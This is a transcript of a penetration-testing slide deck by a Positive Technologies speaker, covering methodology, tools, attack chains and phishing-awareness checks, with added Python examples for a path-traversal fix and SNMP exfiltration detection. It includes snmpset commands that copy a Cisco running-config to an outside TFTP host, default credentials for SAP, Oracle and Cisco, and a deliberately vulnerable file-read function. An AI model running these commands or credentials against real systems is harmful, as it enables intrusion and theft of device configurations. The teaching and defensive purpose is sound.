Penetration testing, What’s this?
Chart legend (weak password slide): lower-case English letters, digits and special symbols; other symbols

Transcript of "Penetration testing, What’s this?"

1. Penetration testing: What’s this? Dmitry Evteev (Positive Technologies)
2. Penetration testing internals
   • Penetration testing != simulation of (un)real attacker activities
   • Penetration testing != instrumental scanning with manual vulnerability verification
   • Penetration testing
     • is a set of activities aimed at estimating the current status of security processes;
     • is a test of bypassing protection mechanisms;
     • is one of the security audit methods.
3. Methodology
   • On the one hand, the following best practices are used:
     • Open Source Security Testing Methodology Manual (OSSTMM)
     • Web Application Security Consortium (WASC)
     • Open Web Application Security Project (OWASP)
     • …
   • On the other hand, the following standards are used:
     • Center for Internet Security (CIS) guides
     • ISO 2700x series standards
     • …
4. Abilities
   (diagram: protection mechanisms N … X feeding incident management; some activities were detected but not identified as an attack)
5. Aims
   • High-level
     • Internal policy (pentest as an instrument of pressure)
     • Estimation of current security processes
     • Required by regulation (compliance)
   • Technological
     • Get unauthorized access to the internal network from the Internet
     • Gain maximum privileges in the main infrastructure systems (Active Directory, network hardware, DBMS, ERP, etc.)
     • Get access to certain information resources
     • Get access to certain data (information)
6. Approaches
   • Perimeter pentest (with further attacks in the internal network)
     • With or without administrator awareness
     • Wireless network security analysis
   • Internal pentest
     • From an average user workstation
     • From a chosen network segment
   • Testing of a certain information system component (security analysis)
     • Black, Grey and White Box
   • Assessment of employee awareness in information security
7. Real attack VS penetration testing
   • For the direct executor, a pentest is HACKING!
   • Limitations
     • Compliance with Russian Federation legislation
     • Limited time
     • Minimum impact
     • No testing like DDoS
   • Inconveniences
     • Coordination of actions (it can run into a very absurd extreme!)
     • Responsibility/Punctuality
   • Advantages
     • No need to hide the activities
     • Simplified network perimeter identification
     • A possibility to use Grey and White Box methods
8. Instruments
   • Positive Technologies MaxPatrol
   • Nmap/dnsenum/dig …
   • …
   • Immunity Canvas (VulnDisco, Agora Pack, VoIP Pack)
   • Metasploit
   • …
   • THC Hydra/THC PPTP bruter/ncrack …
   • Cain and Abel/Wireshark
   • Aircrack
   • …
   • Yersinia
   • …
   • Browser, notepad …
9. Web application security problem
   • The most frequent web application vulnerabilities detected by the “Black Box” method (2009 statistics, http://ptsecurity.ru/analytics.asp)
10. Pentest example: web applications
   • What is a web application pentest by the Black Box method? (real world)
   (diagram: the auditor workstation sends Check 1 … Check N to the web server until a vulnerability is detected)
   • Vulnerability 1: password bruteforce. Impact: access to the application (with limited privileges)
   • Vulnerability 2: SQL injection. Impact: file reading only (the magic quotes option is enabled)
   • Vulnerability 3: path traversal. Impact: file reading only (potentially LFI)
   • Vulnerability 4: predictable identifier of an uploaded file. Vulnerability 3 + Vulnerability 4 = Impact: command execution on the server
   • Next step: FURTHER ATTACK
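The chain on this slide (a traversal read aimed at an upload whose name is guessable) next to its fix, as an added Python illustration that is not part of the deck; UPLOAD_ROOT, vulnerable_store/vulnerable_read, safe_store/safe_read and traversal_demo are hypothetical names, and the "secret" file traversal_demo plants beside the upload directory is constructed for the check.

```python
import os
import secrets
import tempfile
UPLOAD_ROOT = tempfile.mkdtemp(prefix="uploads-")  # stand-in for the app's upload directory
_counter = 0  # sequential id, as in the vulnerable application

def vulnerable_store(data):
    """Vulnerability 4: predictable name, so one upload reveals the naming of all others."""
    global _counter
    _counter += 1
    name = f"upload_{_counter}.dat"
    with open(os.path.join(UPLOAD_ROOT, name), "wb") as fh:
        fh.write(data)
    return name

def vulnerable_read(name):
    """Vulnerability 3: '..' segments in name escape UPLOAD_ROOT (path traversal)."""
    with open(os.path.join(UPLOAD_ROOT, name), "rb") as fh:
        return fh.read()

def safe_store(data):
    """Unguessable identifier: a traversal bug can no longer be aimed at a known upload."""
    name = secrets.token_urlsafe(16)
    with open(os.path.join(UPLOAD_ROOT, name), "wb") as fh:
        fh.write(data)
    return name

def safe_read(name):
    """Resolve the path and refuse anything that lands outside UPLOAD_ROOT."""
    root = os.path.realpath(UPLOAD_ROOT)
    target = os.path.realpath(os.path.join(root, name))
    if target == root or os.path.commonpath([root, target]) != root:
        raise PermissionError("path escapes the upload directory")
    with open(target, "rb") as fh:
        return fh.read()

def traversal_demo():
    # Constructed check: a file beside UPLOAD_ROOT leaks via '../' only through vulnerable_read.
    parent, base = os.path.split(UPLOAD_ROOT)
    outside = os.path.join(parent, base + ".secret")
    with open(outside, "wb") as fh:
        fh.write(b"constructed secret")
    leaked = vulnerable_read("../" + base + ".secret")
    try:
        safe_read("../" + base + ".secret")
        blocked = False
    except PermissionError:
        blocked = True
    os.remove(outside)
    return leaked, blocked
```

Both fixes matter: the random name alone leaves the traversal read in place, and the path check alone still lets a low-privilege user locate the file they just uploaded.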
11. Weak password problem
   • The recommended password policy is used
   • What is the domain administrator password? (coincides with the login)
   (chart: distribution of password character classes)
12. Pentest example: password bruteforce (defaults)
   • Well known
     • admin:123456
     • Administrator:P@ssw0rd
     • …
   • SAP
     • (DIAG) SAP*: 06071992, PASS
     • mandants (clients): 000, 001, 066, all new
     • (RFC) SAPCPIC: ADMIN
     • mandants (clients): 000, 001, 066, all new
     • …
   • Oracle
     • sys:manager
     • sys:change_on_install
     • …
   • Cisco
     • Cisco:Cisco
     • …
   • …
13. Pentest example: Hello, Pavlik :)
   snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1
   snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4
   snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1
   snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host>
   snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config
   snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1
   snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
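A defender-side way to recognise the sequence above in SNMP SET telemetry, as an added Python example that is not from the deck: it decodes the ccCopyEntry columns of CISCO-CONFIG-COPY-MIB written by the commands and alerts when a device config is pushed to a server outside an allow-list. The "<device> SET <oid> = <value>" log format, the function names and the sample lines are assumptions constructed for the example.

```python
import ipaddress
import re
CC_COPY_PREFIX = "1.3.6.1.4.1.9.9.96.1.1.1.1."  # CISCO-CONFIG-COPY-MIB ccCopyEntry.<col>.<row>
CC_COPY_COLUMNS = {
    2: "ccCopyProtocol",         # 1 = tftp
    3: "ccCopySourceFileType",   # 3 = startupConfig, 4 = runningConfig
    4: "ccCopyDestFileType",     # 1 = networkFile
    5: "ccCopyServerAddress",    # host that receives the copy
    6: "ccCopyFileName",
    14: "ccCopyEntryRowStatus",  # 1 = active, 4 = createAndGo, 6 = destroy
}
CONFIG_SOURCES = {3, 4}
NETWORK_FILE = 1
# Constructed sample in a hypothetical collector format: "<device> SET <oid> = <value>"
SAMPLE_LOG = """\
10.0.0.1 SET .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 = 1
10.0.0.1 SET .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 = 4
10.0.0.1 SET .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 = 1
10.0.0.1 SET .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 = 203.0.113.7
10.0.0.1 SET .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 = running-config
10.0.0.1 SET .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 = 1
10.0.0.1 SET .1.3.6.1.2.1.1.5.0 = core-sw1
"""
LINE_RE = re.compile(r"^(\S+) SET (\S+) = (.*)$", re.M)

def parse_copy_rows(log):
    """Group ccCopyTable writes by (device, row index) into {column name: value}."""
    rows = {}
    for device, oid, value in LINE_RE.findall(log):
        oid = oid.lstrip(".")
        if not oid.startswith(CC_COPY_PREFIX):
            continue  # some other SET (here sysName); not a config copy
        col, row = oid[len(CC_COPY_PREFIX):].split(".", 1)
        name = CC_COPY_COLUMNS.get(int(col))
        if name:
            rows.setdefault((device, row), {})[name] = value.strip()
    return rows

def find_config_exfil(log, trusted_servers=()):
    """Alert on rows that copy a device config to a host outside the trusted set."""
    trusted = {ipaddress.ip_address(s) for s in trusted_servers}
    alerts = []
    for (device, row), f in parse_copy_rows(log).items():
        src = int(f.get("ccCopySourceFileType", 0))
        dst = int(f.get("ccCopyDestFileType", 0))
        server = f.get("ccCopyServerAddress")
        if src in CONFIG_SOURCES and dst == NETWORK_FILE and server \
                and ipaddress.ip_address(server) not in trusted:
            alerts.append((device, row, server, f.get("ccCopyFileName")))
    return alerts
```

The writes only succeed because a writable community (here the default "private") is reachable; restricting SNMP writes to SNMPv3 with authentication, or to read-only communities behind an ACL, removes the path that the detection above watches for.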
14. The problem of access control
   • Network access
     • Network architecture (DMZ, technological network, user segment, testing environment)
     • Remote network access
   • Data access
     • Shared resources (passwords in clear text, data backup copies, other sensitive data)
     • Web applications, DBMS, ERP
15. The problem of access control
   • Division of privileges among administrators
   • Users with extended privileges
   • Services (!) with a higher access level than required
   • General problem of identity management
16. Pentest example: use of vulnerabilities
   • CANVAS && Metasploit
17. Pentest example: privilege escalation in Active Directory
   • Version 1: password bruteforce
   • Version 2: vulnerabilities in domain controller services
   • Version 3: pass-the-hash attack
   • Version 4: create a new user from a domain computer
   • Version 5: ARP cache poisoning (for example, hijack an RDP session, lower the authentication level to LM)
   • Version 6: NTLM relay attack
   • Version 7: find and restore the domain system state (for example, after a successful attack on the backup server)
   • Version 8: get extended privileges through other systems (for example, control items in the company’s root DNS)
   • Version 9: get extended privileges via other systems’ vulnerabilities (passwords stored with reversible encryption, insecure protocols in use, etc.)
   • Version N …
18. Pentest example: security analysis
   • Network scanning
   • Password is bruteforced!
     • Exploitation of SQL injection
     • Command execution on the server
     • Privilege gaining
     • Internal resources attack
     • Internal pentest
     • Install MaxPatrol scanner
     • Find vulnerabilities
     • Exploit vulnerabilities
     • Move to the Head office network
     • Conduct attacks on Head office resources
     • Get maximum privileges in the whole network!
19. Pentest example: security analysis
20. Pentest example: wireless networks
21. Pentest example: assessment of awareness program efficiency
   • Send provocative messages via e-mail
   • Send provocative messages via ICQ (and other IM)
   • Distribute data media with provocative messages
   • Question employees
   • Talks (by telephone, Skype)
22. Pentest example: example of a set of checks
   Note description | Attack | Monitored events
   A note from authority with an attached executable file. | Spread of network worms. System infection with a Trojan horse. | Open the mailbox. Execute the attached file.
   A note from an internal person with a link to a web site; the link points to an executable file. | Phishing attacks. Spread of network worms. System infection with a Trojan horse. Attacks through software vulnerabilities. | Open the mailbox. Download the file from the web server. Execute the file.
   A note from authority with a link to a web site. | Phishing attacks. Spread of network worms. System infection with a Trojan horse. Attacks through software vulnerabilities. | Open the mailbox. Follow the link.
23. Pentest example: assessment of awareness program efficiency
   (chart: users that follow the link, single pentest vs. regular pentest)
24. Conclusions
   • Penetration testing is a set of activities that allows an efficient assessment of current security processes
   • Penetration testing is the search for and use of flaws in security processes:
     • vulnerability management
     • configuration management
     • incident management
     • security management of web applications, DBMS, ERP, wired and wireless networks, etc.
     • etc.
25. Thank you for your attention! Any questions? [email_address] http://devteev.blogspot.com/